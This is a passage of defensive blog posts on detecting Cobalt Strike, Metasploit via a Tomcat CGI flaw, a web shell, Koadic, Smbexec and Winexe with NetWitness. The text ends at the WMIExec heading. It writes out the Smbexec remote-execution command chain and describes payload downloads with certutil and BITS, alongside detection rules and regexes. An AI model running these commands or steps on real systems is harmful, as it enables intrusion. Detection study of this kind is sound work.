RSA NetWitness Platform

Posts authored by: Lee Kirkpatrick

I have recently been posting a number of blogs regarding the usage of the RSA NetWitness Platform to detect attackers within your environment. As the list of blogs grows, it is becoming increasingly difficult to navigate through them easily. To combat this, this blog post will contain references to all other blog posts in the Profiling Attackers Series, and will be updated when new posts are made.
Special thanks to Rui Ataide for his support and guidance for these posts.

Introduction

Cobalt Strike is a threat emulation tool used by red teams and advanced persistent threats for gaining and maintaining a foothold on networks. This blog post will cover the detection of Cobalt Strike based on a malware sample identified on VirusTotal:

 

NOTE: The malware sample was downloaded and executed in a malware VM under an analyst's constant supervision, as this was/is live malware.

The Detection in NetWitness Packets

NetWitness Packets pulls apart characteristics of the traffic it sees. It does this via a number of Lua parsers that reside on the Packet Decoder itself. Some of the Lua parsers have options files associated with them that parse out additional metadata for analysis. One of these is the HTTP Lua parser, which has an associated HTTP Lua options file; you can view this by navigating to Admin ⮞ Services ⮞ Decoder ⮞ Config ⮞ Files and selecting HTTP_lua_options.lua from the drop-down. The option we are interested in for this blog post is headerCatalog() - making this return true will register the HTTP headers in the request and response under the meta keys:

  • http.request
  • http.response

 

And the associated values for the headers will be registered under:

  • req.uniq
  • resp.uniq
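To illustrate the kind of metadata this option produces, the following Python sketch (purely illustrative - not the actual Lua parser) pulls the header names out of a raw HTTP request, much as headerCatalog() registers them under http.request:

```python
# Hypothetical sketch (not the actual Lua parser): extract the HTTP header
# names that headerCatalog() would register under http.request/http.response.
def header_names(raw_http: bytes) -> list:
    """Return lowercased header names from a raw HTTP request or response."""
    head = raw_http.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")[1:]          # skip the request/status line
    return [l.split(b":", 1)[0].strip().lower().decode()
            for l in lines if b":" in l]

raw = (b"GET /KHSw HTTP/1.1\r\n"
       b"Host: 10.0.0.1\r\n"
       b"User-Agent: Mozilla/5.0\r\n\r\n")
print(header_names(raw))                     # ['host', 'user-agent']
```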

 

NOTE: This feature is not enabled in the default options file due to the potential performance impact it may have on the Decoder. This feature is experimental and may be deprecated at any time, so please use it with caution, and monitor the health of all components if enabling it. Also, please look into the customHeaders() function prior to enabling this, as that is a less intensive substitute that could fit your use cases.

 

There are a variety of options that can be enabled here. For more details, see the Hunting Guide: https://community.rsa.com/docs/DOC-62341.

 

These keys will need to be indexed on the Concentrator, and the following addition to the index-concentrator-custom.xml file is suggested:

<key description="HTTP Request Header" format="Text" level="IndexValues" name="http.request" defaultAction="Closed" valueMax="5000" />
<key description="HTTP Response Header" format="Text" level="IndexValues" name="http.response" defaultAction="Closed" valueMax="5000" />
<key description="Unique HTTP Request Header" level="IndexKeys" name="req.uniq" format="Text" defaultAction="Closed"/>
<key description="Unique HTTP Response Header" level="IndexKeys" name="resp.uniq" format="Text" defaultAction="Closed"/>

 

 

One reason for doing this, amongst others, is that the trial version of Cobalt Strike has a distinctive HTTP header that we, as analysts, would like to see: https://blog.cobaltstrike.com/2015/10/14/the-cobalt-strike-trials-evil-bit/. This HTTP header is X-Malware - and with our new option enabled, this header is easy to spot:

NOTE: While this is one use case to demonstrate the value of extracting the HTTP headers, this metadata proves incredibly valuable across the board, as looking for uncommon headers can help analysts uncover and track malicious activity. Another example where this was useful can be seen in one of the previous posts regarding PoshC2, whereby an application rule was created to look for the incorrectly supplied cachecontrol HTTP response header: https://community.rsa.com/community/products/netwitness/blog/2019/03/04/command-and-control-poshc2
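The idea of hunting for uncommon headers can be sketched as a simple baseline comparison. This Python example is illustrative only - the baseline list is a made-up assumption, not NetWitness logic - but it shows how a header such as X-Malware immediately surfaces:

```python
# Illustrative only: flag HTTP headers that fall outside a baseline of
# commonly seen header names. The X-Malware header from the Cobalt Strike
# trial would surface immediately. The baseline set is a fabricated example.
COMMON = {"host", "user-agent", "accept", "content-type", "content-length",
          "server", "date", "connection", "cache-control"}

def uncommon_headers(headers):
    return [h for h in headers if h.lower() not in COMMON]

seen = ["Host", "User-Agent", "X-Malware"]
print(uncommon_headers(seen))   # ['X-Malware']
```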

 

Pivoting off this header and opening the Event Analysis view, we can see an HTTP GET request for KHSw, which was made direct to IP over port 666 and had a low header count with no referrer - this should stand out as suspicious even without the initial indicator we used for analysis:

 

If we had decided to look for traffic using the Service Analysis key, which pulls apart the characteristics of the traffic, we would have been able to pivot off of these metadata values to whittle down our traffic to this as well:

 

Looking into the response for the GET request, we can see the X-Malware header we pivoted off of, and the stager being downloaded. Also take notice of the EICAR test string in the X-Malware header; this too is indicative of a trial version of Cobalt Strike:

 

NetWitness Packets also has a parser to detect this string, and will populate the metadata value, eicar test string, under the Session Analysis meta key (if the Eicar Lua parser has been pushed from RSA Live) - this could be another great pivot point to detect this type of traffic:
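As a minimal stand-in for what such a parser checks, the following Python sketch scans a payload for the standard EICAR test string (the string itself is public and well known; the scanning code here is an illustration, not the Lua parser):

```python
# A minimal stand-in for an EICAR-detection parser: scan a payload for the
# standard EICAR test string, which the Cobalt Strike trial embeds in its
# X-Malware header.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

def contains_eicar(payload: bytes) -> bool:
    return EICAR in payload

print(contains_eicar(b"X-Malware: " + EICAR))  # True
print(contains_eicar(b"GET / HTTP/1.1"))       # False
```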

 

Further looking into the Cobalt Strike traffic, we can start to uncover more details surrounding its behaviour. Upon analysis, we can see that there are multiple HTTP GET requests with no error (i.e. 200 OK) and a content-length of zero, which stands out as suspicious behaviour. As well as this, there is a cookie that looks like a Base64-encoded string (equals signs at the end for padding) with no name/value pairs; cookies normally consist of name/value pairs, so these two observations make the cookie anomalous:

 

Based off of this behaviour, we can start to think about how to build content to detect it. Heading back to our HTTP Lua options file on the Decoder, we can see another option named customHeaders() - this allows us to extract the values of HTTP headers into a field of our choosing. This means we can choose to extract the cookie into a meta key named cookie, and content-length into a key named http.respsize. This allows us to map a specific HTTP header value to a key so we can create content based off of the behaviours we previously observed:

 

After making the above change, we also need to add the following keys to our index-concentrator-custom.xml file - these are set to the index level IndexKeys, as the values that can be returned are unbounded and we don't want to bloat the index:

<key description="Cookie" format="Text" level="IndexKeys" name="cookie" defaultAction="Closed"  />
<key description="HTTP Response Size" format="Text" level="IndexKeys" name="http.respsize" defaultAction="Closed" />

 

Now we can work on creating our application rules. Firstly, we want to alert on the suspicious GET requests we were seeing:

service = 80 && action = 'get' && error !exists && http.respsize = '0' && content='application/octet-stream'

And for the anomalous cookie, we can use the following logic. This looks for no name/value pairs being present, and for equals signs at the end of the string, which can indicate padding for Base64-encoded strings:

service = 80 && cookie regex '^[^=]+=*$' && content='application/octet-stream'
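The regex in this rule can be sanity-checked outside NetWitness. This Python sketch applies the same pattern to two example cookie values (the values themselves are fabricated samples): a Base64-like cookie with no name/value pairs matches, while a normal name=value cookie does not:

```python
import re

# Same pattern as the application rule's cookie check: a cookie with no
# name/value pairs and optional trailing '=' padding (Base64-like) matches.
ANOMALOUS_COOKIE = re.compile(r"^[^=]+=*$")

print(bool(ANOMALOUS_COOKIE.match("kUd2fG9vZGJ5ZQo=")))           # True
print(bool(ANOMALOUS_COOKIE.match("sessionid=abc123; lang=en")))  # False
```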

These will be two separate application rules that will be pushed to the Decoders:

 

Now we can start to track the activity of Cobalt Strike easily in the Investigate view. This could also potentially alert the analyst to other infected hosts in their environment. This is why it is important to analyse the malicious traffic and create content to track:

 

Conclusion

Cobalt Strike is a very malleable tool. This means that the indicators we have used here will not detect all instances of Cobalt Strike; with that being said, this is known common Cobalt Strike behaviour. This blog post was intended to showcase how the HTTP Lua options file can be instrumental in identifying anomalous traffic in your environment, using real-world live malware. The extraction of the HTTP headers, whilst a trivial piece of information, can be vital in detecting advanced tools used by attackers. This, coupled with the extraction of the header values themselves, can help your analysts create more advanced, higher fidelity content.

Preface

To prevent confusion, I wanted to add a little snippet before we jump into the analysis. The blog post first goes over how the server became infected with Metasploit: a remote code execution CVE was used against an Apache Tomcat web server, the details of which can be found here: https://nvd.nist.gov/vuln/detail/CVE-2019-0232. Further into the blog post, details of Metasploit can be seen.

 

This CVE requires that the CGI Servlet in Apache Tomcat is enabled. This is not an abnormal servlet to have enabled, and merely requires the administrator to uncomment a few lines in the Tomcat web.xml. This is a normal administrative action to have taken on the web server:

  


Now, if the administrator has a .bat or .cmd file in the cgi-bin directory on the Apache Tomcat server, the attacker can remotely execute commands: Apache will call cmd.exe to execute the .bat or .cmd file and incorrectly handle the parameters passed. This file can contain anything, as long as it executes. So, as an example, we place a simple .bat file in the cgi-bin directory:

 

From a browser, the attacker can call the .bat file and pass a command to execute, due to the way the CGI Servlet handles this request and passes the arguments:

 

From here, the attacker can create a payload using msfvenom and instruct the web server to download the Metasploit payload they had created:

 

The Detection in NetWitness Packets

RCE Exploit
NetWitness Packets does a fantastic job of pulling apart the behaviour of network traffic. This allows analysts to detect attacks even with no prior knowledge of them. A fantastic meta value for analysts to look at is windows cli admin commands; this metadata is created when CLI commands are detected. Grouping this metadata with inbound traffic to your web servers is a great pivot point to start looking for malicious traffic:

 

NOTE: Taking advantage of the traffic_flow_options.lua parser would be highly beneficial for your SOC. This parser allows you to define your subnets and tag them with friendly names. Editing this to contain your web servers' address space, for example, would be a great idea.

 

Taking the above note into account, your analysts could then construct a query like the following:
(analysis.service = 'windows cli admin commands') && (direction = 'inbound') && (netname.dst = 'webservers')
Filtering on this metadata reduces the traffic quite significantly. From here, we can open up other meta keys to get a better understanding of what traffic is related to these windows cli commands. From the below screenshot, we can see that this is HTTP traffic, with a GET request to a hello.bat file in the /cgi-bin/ directory; there are also some suspicious-looking queries associated with it that appear to reference command-line arguments:

 

At this point, as we have some suspicions surrounding this traffic, we decide to reconstruct the raw sessions themselves to see exactly what these HTTP sessions are. Upon doing so, we can see a GET request with the dir command, and we can also see the dir output in the response - this is what the windows cli admin commands metadata was picking up on:

 

This traffic instantly stands out as something of interest that requires further investigation. In order to get a holistic view of all data toward this server, we need to reconstruct our query: the windows cli admin commands metadata would only have picked up on the sessions where it saw CLI commands, but we are interested in seeing them all. So we look at the metadata available for this session and build a new query. This now allows us to see other interesting metadata and get a better idea of what the attacker was doing. Looking at the Query meta key, we can see all of the attacker's commands:

 

Navigating to the Event Analysis view, we can see the commands in the order they took place and reconstruct what the attacker was doing. From here we can see a sequence of events whereby the attacker makes a directory, C:\temp, downloads an executable called 2.exe to said directory, and subsequently executes it:

 

MSF File and Traffic

As well as the attacker's commands, we can also see the download of an executable they performed, a.exe. This means we can run a query and extract that file from the packet data as well. We run a simple query looking for a.exe and we find our session. Also, take note of the user agent: why is certutil being used to download a.exe? This is also a great indicator of something suspicious:

 

We can also choose to switch to the File Analysis view and download our file(s). This would allow us to perform additional analysis on the file(s) in question:

 

Merely running strings against one of these files yields a domain this executable may potentially connect to:
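For readers unfamiliar with the technique, a tiny Python approximation of the Unix strings utility used here would be (the sample blob is fabricated for illustration):

```python
import re

# A tiny approximation of the Unix `strings` utility: pull printable
# ASCII runs of four or more characters out of a binary blob.
def strings(data: bytes, min_len: int = 4):
    return [m.group().decode() for m in
            re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

blob = b"\x00\x01MZ\x90\x00http://evil.example/a\x00\x02\x03"
print(strings(blob))   # ['http://evil.example/a']
```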

 

As we now have another hostname to add to our analysis, we can perform a query on just this hostname to see if there is any other interesting metadata associated with it. Opening the Session Analysis meta key, we can see a myriad of interesting pivot points. We can group these pivot points together, or make combinations of them, to whittle down the traffic to something more manageable:

NOTE: See the RSA IR Hunting guide for more details on these metadata values: https://community.rsa.com/docs/DOC-62341

 

Once we have pivoted down using some of the metadata above, we start to get down to a more manageable number of sessions. Continuing to look at the Service Analysis meta key, we also observe some additional pieces of metadata of interest that we can use to start reconstructing the sessions, to get a better understanding of what this traffic is:

 

  • long connection
  • http no referer
  • http six or less headers
  • http post missing content-type
  • http no user-agent
  • watchlist file fingerprint

 

 

Opening these sessions in the Event Analysis view, we can see an HTTP POST with binary data, and a 200 OK from the supposed Apache server; we can also see the directory is the same one we saw in our strings analysis:

 

Continuing to browse through these sessions, yields more of the same:

 

Navigating back to the Investigate view, it is also possible to see that the directory is always the same one we saw in our strings analysis:

 

NOTE: During the analysis, no beaconing pattern was observed. This can make the C2 harder to detect, and requires continued threat hunting from your analysts to understand your environment and pick up on these types of anomalies.

 

Web Shell

Now that we know the Apache Tomcat web server is infected, we can look at all other traffic associated with it and continue to monitor to see if anything else takes place; attackers like to keep multiple entry points if possible. Focusing on our web server, we can also see a JSP page being accessed that sounds odd, error2.jsp, and observe some additional queries:

 

Pivoting into the Event Analysis view and reconstructing the sessions, we can see a tasklist command being executed:

 

And the subsequent response of the tasklist output. This is a web shell that has been placed on the server, which the attacker is also using to execute commands:

 

NOTE: For more information on Web Shells, see the following series: https://community.rsa.com/community/products/netwitness/blog/2019/02/12/web-shells-and-netwitness

 

It is important to note that just because you have identified one method of remote access, that does not mean it is the only one; it is important to ascertain whether or not other access methods were made available by the attacker.

 

The Detection in NetWitness Endpoint
As I preach in every blog post, the analyst should always log in every morning and check the following three meta keys as a priority: IOC (Indicators of Compromise), BOC (Behaviours of Compromise), and EOC (Enablers of Compromise). Looking at these keys, a myriad of pieces of metadata stand out as great places to start the investigation, but let's place a focus on these three for now:

 

Let's take downloads binary using certutil to start, and pivot into the Event Analysis view. Here we can see the certutil binary being used to download a variety of the executables we saw in the packet data:

 

Looking into one of the other behaviours of compromise, http daemon runs command shell, we can also see evidence of the .bat file being requested and the associated commands, as well as the use of the web shell, error2.jsp. It is also important to note that there is a request for hello.bat prior to the remote code execution vulnerability being exploited; this would be seen as legitimate traffic, given that the server is working as designed for the cgi-bin scripts. It is down to the analyst to review the traffic and decipher whether something malicious is happening, or whether this is by design of the server:

 

NOTE: Due to the nature of how the Tomcat server handles the vulnerable cgi-bin application and "legitimate" JSP files, you can see hello.bat as part of the tracking event, as it is an argument passed to cmd.exe. With error2.jsp, however, the page is executed inside the Tomcat process, and only when the web shell spawns a new command shell to execute certain commands will you see cmd.exe being executed - not every time error2.jsp is used. Having said that, the advantage for the defender is that even if not all of the activity is tracked, or leaves a visible footprint, at some point something will, and this could be the starting thread needed to detect the intrusion.

 

Coming back to the Investigate view, we can see another interesting piece of metadata, creates remote service - let's pivot on this and see what took place:

Here we can see that cmd was used to create a service on our web server that would run a malicious binary dropped by the attacker in the C:\temp directory:

 

It is important to remember that, as a defender, you only need to pick up on one of these artifacts left over from the attacker in order to start unraveling their activity.

 

Conclusion
With today's ever-changing landscape, it is becoming increasingly inefficient to create signatures for known vulnerabilities and attacks. It is therefore far more important to pick up on behaviours of traffic that stand out as abnormal than to generate signatures. As shown in this blog post, a fairly recent remote code execution CVE was exploited (https://nvd.nist.gov/vuln/detail/CVE-2019-0232), and no signatures were required to pick up on it, as NetWitness pulls apart the behaviours - we just had to follow the path. Similarly, with Metasploit it is very difficult to generate effective, long-lived signatures that could detect this C2; performing threat hunting through the data, based on a foundation of analysing behaviours, will ensure that both knowns and unknowns are effectively analysed.

 

It is also important to note that this packet traffic would typically be encrypted, but we kept it in the clear for the purposes of this post. With that being said, the RCE exploit and web shell are easily detectable when NetWitness Endpoint tracking data is being ingested, and this gives the defender the necessary visibility if SSL decryption is not in place.

Attackers love to use readily available red team tools for various stages of their attacks, as this removes the labour required to create their own custom tools. This is not to say that the more innovative APTs are going down this route, but it is something that appears to be becoming more prevalent, and your analysts should be aware of it. This blog post covers a readily available red team tool from GitHub.

 

Tools

In this blog post, the Koadic C2 will be used. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire.

 

The Attack

The attacker sets up their Koadic listener and builds a malicious email to send to their victim. The attacker wants the victim to run their malicious code, and in order to do this, they try to make the email look more legitimate by supplying a Dropbox link, and a password for the file:

 

The user downloads the ZIP, decompresses it using the password in the email, and is presented with a JavaScript file that has a .doc extension. Here the attacker is relying on the victim not being well versed with computers, and not noticing the obvious problems with this file (extension, icon, etc.):
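This naming trick can be sketched as a simple check. The extension lists below are example assumptions for illustration, not NetWitness logic, and the filenames are fabricated:

```python
# Illustrative check for the deceptive naming trick described above:
# a "document" that is really a script, e.g. invoice.doc.js.
DECOY = {"doc", "docx", "pdf", "xls", "xlsx"}
SCRIPT = {"js", "jse", "vbs", "wsf", "hta"}

def deceptive_double_extension(filename: str) -> bool:
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DECOY and parts[2] in SCRIPT

print(deceptive_double_extension("invoice.doc.js"))   # True
print(deceptive_double_extension("invoice.docx"))     # False
```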

 

 

 

Fortunately for the attacker, the victim double clicks the file to open it and they get a call back to their C2:

 

From here, the attacker can start to execute commands:

 

 

The Detection in NetWitness Packets

The analyst begins their investigation by placing a focus on looking for C2 traffic over HTTP. From here, the analyst can then start to pull apart the protocol and look for anomalies within its behaviour; the analyst opens the Service Analysis meta key to do this and observes two pieces of metadata of interest:

 

  • http post missing content-type

  • http post no get

 

 

 

These two queries have now reduced the data set for the analyst from 2,538 sessions to 67:

 

NOTE: This is not to say that the other sessions do not have malicious traffic, nor that the analyst will ignore them; it is just that, at this point in time, this is the analyst's focal point. If this traffic, after analysis, turned out to be clean, they could exclude it from their search and pick apart other anomalous HTTP traffic in the same manner as before. This allows the analyst to go through the data in a more comprehensive and approachable manner.

 

Now that the data set has been reduced, the analyst can start to open other meta keys to understand the context of the traffic. The analyst wants to see if any files are being transferred, and which user agents are involved; to do so, they open the Extension, Filename, and Client Application meta keys. Here they observe an extension they do not typically see during their daily hunting, WSF. They also see what appears to be a random filename, and a user agent they are not overly familiar with:

 

There are only eight sessions for this traffic, so the analyst is now at a point where they can start to reconstruct the raw sessions and see if they can better understand what this traffic is for. Opening the Event Analysis view, the analyst first looks to see if they can observe any pattern in the connection times, and at how much the payload varies in size:

NOTE: Low variation in payload size, and connections that take place every x minutes, are indicative of automated behaviour. Whether that behaviour is malicious or not is up to the analyst to decipher - it could be a simple weather update, for example - but this sort of automated traffic is exactly what the analyst should be looking for when it comes to C2 communication: weeding out the user-generated traffic to get to the automated communications.
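The heuristic in this note can be sketched in a few lines of Python. This is a hedged illustration, not NetWitness logic - the jitter and size-spread thresholds, timestamps, and payload sizes are all made-up example values:

```python
from statistics import pstdev, mean

# Sketch of the note above: regular inter-arrival times plus low
# payload-size variation suggests automated (possibly C2) traffic.
def looks_automated(timestamps, sizes, jitter=5.0, size_spread=0.1):
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    regular = pstdev(gaps) <= jitter                    # consistent beacon interval
    steady = pstdev(sizes) <= size_spread * mean(sizes) # consistent payload size
    return regular and steady

beacons = [0, 300, 600, 901, 1199]          # seconds: roughly every 5 minutes
payloads = [412, 408, 415, 410, 409]        # bytes: barely varies
print(looks_automated(beacons, payloads))   # True
```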

 

Reconstructing the sessions, the analyst stumbles across a session that contains a tasklist output. This immediately stands out as suspicious to the analyst:

 

From here, the analyst can build a query to focus on this communication between these two hosts and find out when this activity started happening:

 

Looking into the first sessions of this activity, the analyst can see a GET request for the oddly named WSF file, and that BITS was used to download it:

 

The response for this file contains the malicious JavaScript that infected the endpoint:

 

Further perusing the sessions, it is also possible to see the commands being executed by the attacker:

 

The analyst is now extremely confident this is malicious traffic and needs to be able to track it. The best way to do this is with an application rule. The analyst looks through the traffic and decides upon the following two pieces of logic to detect this behaviour:

 

To detect the initial infection:

extension = 'wsf' && client contains 'bits'

To detect the beacons:

extension = 'wsf' && query contains 'csrf='

 

NOTE: The activity observed was only possible due to the communication happening over HTTP. If this had been SSL, the detection via packets would be much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle that breaks the encryption into two separate encrypted streams. Therefore, they still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the C2 traffic shown here. In summary, if you are responsible for protecting your organization's assets, you should definitely consider the pros and cons of using this technology.

 

The Detection in NetWitness Endpoint

Every day, the analyst should review the IOC, BOC, and EOC meta keys, paying particular attention to the high-risk indicators first. Here the analyst can see a high-risk meta value, transfers file using bits:

 

In the Event Analysis view, the analyst can see cmd.exe spawning bitsadmin.exe and downloading a suspiciously named file into the \AppData\Local\Temp\ directory. This stands out as suspicious to the analyst:
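The behaviour described above can be approximated with a simple pattern over tracked command lines. This is an illustrative sketch, not the NetWitness rule itself; the command-line sample is fabricated:

```python
import re

# Illustrative pattern: bitsadmin being used to fetch a payload into a
# user's Temp directory via its /transfer switch.
BITS_DOWNLOAD = re.compile(
    r"bitsadmin(\.exe)?\s+/transfer\b.*\\appdata\\local\\temp\\",
    re.IGNORECASE)

cmd = (r"cmd.exe /c bitsadmin /transfer x http://10.0.0.5/UHe29.wsf "
       r"C:\Users\bob\AppData\Local\Temp\UHe29.wsf")
print(bool(BITS_DOWNLOAD.search(cmd)))   # True
```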

 

From here, the analyst places an analytical lens on this specific host and begins to look through what other actions took place around the same time. The analyst observes commands being executed against this endpoint and now knows it is infected:

 

Conclusion

Understanding the nuances between user-based behaviour and mechanical behaviour gives an advantage to the analyst performing threat hunting. If analysts understand what "normal" looks like within their environment, they can easily discern it from abnormal behaviours.

 

Analysts should also be aware that not all attackers will use proprietary tools, or even alter the readily available ones to evade detection. An attacker only needs to make one mistake for you to unravel their whole operation - so don't ignore the low-hanging fruit.

Introduction

Lateral movement is a technique that enables an adversary to access and control remote systems on a network. It is a critical phase in any attack, and understanding the methods that can be used to perform lateral movement - along with how those protocols display themselves in NetWitness - is paramount in detecting attackers moving laterally in your environment. It is also important to understand that many of the mechanisms used by attackers for lateral movement are also used by administrators for legitimate reasons, which is why it is important to monitor these mechanisms and understand what is typical behaviour, and what is not.

 

Tools

In this blog post, the Impacket implementation of Smbexec will be used. This sets up a semi-interactive shell for the attacker.

 

The Attack

The attacker has successfully gained access to your network and dumped credentials, all without any detection from your Security Operations Center (SOC). The attacker decides to move laterally using Smbexec, they connect to one of the hosts they had previously identified and begin to execute commands:

 

The Detection in NetWitness Packets

Smbexec works a little differently from some of the more common lateral movement tools, such as PsExec. Instead of transferring a binary to the target endpoint, using the svcctl interface to remotely create a service from the transferred binary, and starting that service, Smbexec calls a binary that already exists on the endpoint to execute its commands: cmd.exe.

 

NetWitness Packets does a great job of pulling apart packet data and pointing you in directions of interest. One of the meta values we can pivot on to focus on traffic of interest for lateral movement is remote service control:

 

NetWitness also creates metadata when it observes Windows CLI commands being run; this metadata is under the Service Analysis meta key and is displayed as windows cli admin commands. This is another interesting pivot point for us to look into, to see what type of commands are being executed:

 

NOTE: Just because an endpoint is being remotely controlled, and there are commands being executed on it, this does not mean that your network is compromised. It is up to the analyst to review the sessions of interest, as we are doing in this blog post, and determine whether something is out of the ordinary for your environment.

 

Looking into the other metadata available, we can see a connection to the C$ share, and that a filename called __output was created:

 

This does not give us much to go on to say that this is suspicious, so it is necessary to reconstruct the raw session itself to get a better idea of what is happening. Opening the Event Analysis view for the session we reduced our data set to, and analysing the payload, a suspicious string stands out, as shown below:

 

Tidying up the command a little, it ends up looking like this:

%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

  • %COMSPEC% - Environment variable that points to cmd.exe
  • /Q - Turns echo off
  • /c - Carries out the command specified by the string and then terminates
  • %TEMP% - Environment variable that points to C:\Users\username\AppData\Local\Temp

 

We can see that the string above will echo the command we want to execute (dir) into a file named __output on the C$ share of the local machine. The command we want to execute also gets placed into execute.bat in the %TEMP% directory, which is subsequently executed and then deleted.
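A hedged sketch of detection logic for this pattern - command output echoed to \\127.0.0.1\C$\__output via a temporary batch file - could look like the following Python regex. This mirrors the idea in Python for illustration and is not the application rule itself:

```python
import re

# Illustrative pattern for the Smbexec command chain broken down above:
# %COMSPEC% redirecting output to \\127.0.0.1\C$\__output via execute.bat.
SMBEXEC = re.compile(
    r"%COMSPEC%.*>\s*\\\\127\.0\.0\.1\\C\$\\__output.*execute\.bat",
    re.IGNORECASE)

cmd = (r"%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > "
       r"%TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & "
       r"del %TEMP%\execute.bat")
print(bool(SMBEXEC.search(cmd)))   # True
```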

 

Analysing the payload further, we can also see the data that is returned from the command that was executed by the attacker:

 

Now that suspicious traffic has been observed, we can filter on this type of traffic, and see other commands being executed, such as whoami:

 

Smbexec is quite malleable; a vast majority of the indicators can easily be edited to evade signature-type detection. However, using NetWitness Packets' ability to carve out behaviours, the following application rule logic should be suitable to pick up on suspicious traffic over SMB that an analyst should investigate to detect this type of behaviour:

(ioc = 'remote service control') && (analysis.service = 'windows cli admin commands') && (service = 139) && (directory = '\\c$\\','\\ADMIN$\\') 
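To show how this rule's multi-valued directory match behaves, here is a small Python emulation of the same logic applied to example session metadata. The session dicts are fabricated samples, and this is a sketch of the rule's semantics rather than the Decoder's evaluation engine:

```python
# Emulating the Smbexec application rule above against example session
# metadata, to show how the multi-valued directory match works.
def matches_rule(session):
    return (session.get("ioc") == "remote service control"
            and session.get("analysis.service") == "windows cli admin commands"
            and session.get("service") == 139
            and session.get("directory") in ("\\c$\\", "\\ADMIN$\\"))

hit  = {"ioc": "remote service control",
        "analysis.service": "windows cli admin commands",
        "service": 139, "directory": "\\c$\\"}
miss = dict(hit, directory="\\share\\")
print(matches_rule(hit), matches_rule(miss))   # True False
```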

 

The Detection in NetWitness Endpoint

NetWitness Endpoint does a great job of picking up on this activity. Looking at the Behaviours of Compromise meta key, two pieces of metadata point the analyst toward this activity: services runs command shell and runs chained command shell:

 

Opening the Event Analysis view for these sessions, we can see that services.exe is spawning cmd.exe, and we can also see the command that is being executed by the attacker:

 

The default behaviour of Smbexec could easily be detected with application rule logic like the following:

param.dst contains '\\127.0.0.1\C$\__output'

Conclusion

Understanding the tools, techniques, and procedures (TTPs) used by attackers, coupled with understanding how NetWitness interprets those TTPs, is imperative to being able to identify them within your network. The NetWitness suite has great capabilities to pull apart network traffic and pick up on anomalies, which makes it easier for analysts to hunt down and detect these threats.

Introduction

Lateral movement is a technique that enables an adversary to access and control remote systems on a network. It is a critical phase in any attack, and understanding the methods that can be used to perform lateral movement - along with how those protocols display themselves in NetWitness - is paramount in detecting attackers moving laterally in your environment. It is also important to understand that many of the mechanisms used by attackers for lateral movement are also used by administrators for legitimate reasons, which is why it is important to monitor these mechanisms and understand what is typical behaviour, and what is not.

 

Tools

In this blog post, Winexe will be used. Winexe is a GNU/Linux-based application that allows users to execute commands remotely on Windows NT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows execution of most Windows shell commands.

 

The Attack

The attacker has successfully gained access to your network and dumped credentials, all without any detection from your Security Operations Center (SOC). The attacker decides to move laterally using Winexe; they connect to one of the hosts they had previously identified and begin to execute commands:

 

The Detection in NetWitness Packets

The use of Winexe is not overly stealthy; it creates a large amount of noise that is easily detectable. Searching for winexesvc.exe within the filename metadata returns the SMB transfer of the executable to the ADMIN$ share:

 

Using the time the file transfer took place as the pivot point to continue investigation, it is also possible to see the use of the Windows Service Control Manager (SCM) directly afterward to create and start a service on the remote endpoint. SCM acts as a remote procedure call (RPC) server so that services on remote endpoints can be controlled:

 

Reconstructing the raw session as text, it is possible to see the service name being created, winexesvc, and the associated executable that was previously transferred being used as the service base, winexesvc.exe:

 

Continuing to analyse the SMB traffic around the same time frame, it is also possible to see another named pipe, ahexec, being used. This is the named pipe that Winexe uses:

 

Reconstructing these raw sessions as text, it is possible to see the commands that were executed:

 

As well as the output that was returned to the attacker:

 

Based on the artefacts left over from Winexe's execution over the network, there are multiple pieces of logic we could use in our application rule to detect this type of traffic. The following application rule logic would pick up on the initial transfer of the winexesvc.exe executable, and the subsequent use of the named pipe ahexec:

(filename = 'ahexec','winexesvc.exe') && (service = 139)

The Detection in NetWitness Endpoint

Searching for winexesvc.exe as the filename source shows the usage of Winexe on the endpoints; this is the executable that handles the commands sent over the ahexec named pipe. The filename destination meta key shows the executables invoked via the use of Winexe:

 

A simple application rule could be created for this activity by simply looking for winexesvc.exe as the filename source:

(filename.src = 'winexesvc.exe')

 

Additional Analysis

Analysing the endpoint, you can see the winexesvc.exe process running from task manager:

 

As well as the service that was installed via SCM over the network:

 

This service creation also creates a log entry in the System event log as event ID 7045:

 

This means if you were ingesting logs into NetWitness, you could create an application rule to trigger on Winexe usage with the following logic:

(reference.id = '7045') && (service.name = 'winexesvc')

We can also see the named pipe which Winexe uses by executing Sysinternals pipelist tool:

Introduction

Lateral movement is a technique that enables an adversary to access and control remote systems on a network. It is a critical phase in any attack, and understanding the methods that can be used to perform lateral movement, along with how those protocols present themselves in NetWitness, is paramount to detecting attackers moving laterally in your environment. It is also important to understand that many of the mechanisms attackers use for lateral movement are also used by administrators for legitimate reasons, which is why it is important to monitor these mechanisms and understand what is typical behaviour and what is not.

 

What is WMI?

At a high level, Windows Management Instrumentation (WMI) provides the ability to manage servers and workstations running Windows, locally or remotely, by allowing data collection, administration, and remote execution. WMI is Microsoft's implementation of the open standards Web-Based Enterprise Management (WBEM) and Common Information Model (CIM), and comes preinstalled on Windows 2000 and newer Microsoft operating systems.

 

Tools

In this blog post, Impacket's implementation of WMIExec will be used. This sets up a semi-interactive shell for the attacker. WMI can be used for reconnaissance, privilege escalation (by looking for well-known misconfigurations), and lateral movement.

 

The Attack

The attacker has successfully gained access to your network and dumped credentials, all without any detection from your Security Operations Center (SOC). The attacker decides to move laterally using WMIExec; they connect to one of the hosts they had previously identified and begin to execute commands:

 

The Detection in NetWitness Packets

